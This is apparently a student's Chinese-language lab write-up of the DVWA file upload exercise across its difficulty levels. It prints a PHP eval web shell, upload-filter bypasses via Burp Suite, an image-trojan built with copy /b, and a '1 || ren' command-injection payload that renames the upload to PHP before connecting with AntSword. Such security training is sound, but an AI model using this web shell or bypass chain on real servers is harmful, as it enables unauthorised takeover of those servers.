文件上传
什么是文件上传漏洞?
文件上传漏洞是指用户上传了一个可执行的脚本文件,并通过此脚本文件获得了执行服务器端命令的能力。这种攻击方式是最为直接和有效的,“文件上传” 本身没有问题,有问题的是文件上传后,服务器怎么处理、解释文件。如果服务器的处理逻辑做的不够安全,则会导致严重的后果。
以上参考于以下链接,想了解更详细的文件上传漏洞内容的同学可以移步此链接
https://blog.csdn.net/qq_48904485/article/details/123645617
本次实验目标为利用上传的木马文件,获取目标服务器的权限,木马文件内容为:<?php @eval($_POST['cmd']); echo"小飞棍来了!"; ?>
本文为学习笔记,仅供学习
low
我直接给他上传个php一句话。没想到就直接成功了。都不用猜,源码一定没有进行防护,所以才能这么顺利上传成功。
查看是否能访问刚刚上传的木马文件
能正常访问,利用中国蚁剑获取服务器Shell,测试连接
连接成功后,添加数据,就可以对目标服务器wsyw了
Medium
像上次一样直接上传PHP
发现行不通,系统只允许上传JPEG或PNG文件,我们是不是还可以利用burp siutr改文件名,从而达到相同的结果呢?浅浅试一下
将红框里的内容中的PNG去掉,发送到重发器重新发送,发现上传成功。
验证一下能否正常访问。
正常访问,利用蚁剑连接
成功获取
High
本次木马使用<?php @eval($_POST['cmd']); ?>
修改文件名在后面加上png后缀,直接上传,发现行不通。
尝试用burp siutr来修改一下
也是行不通的,但我们可以尝试使用一下图片马,来对其进行攻击。
copy muma-high.png/b+muma-high.php/a muma-high.png
上传,
可以正常显示
利用命令漏洞修改后缀,先使用1 || dir 查询与上传返回地址相结合得到目标地址
目标地址为C:\phpstudy_pro\WWW\DVWA-master\hackable\uploads\muma-high.png
使用语句1 || ren C:\phpstudy_pro\WWW\DVWA-master\hackable\uploads\muma-high.png muma-high.php
将上传的png文件后缀改成php
成功连接上
Impossible
先看代码
对上传文件进行了重命名,并加入 token 防护 CSRF 攻击,导致攻击者无法上传木马文件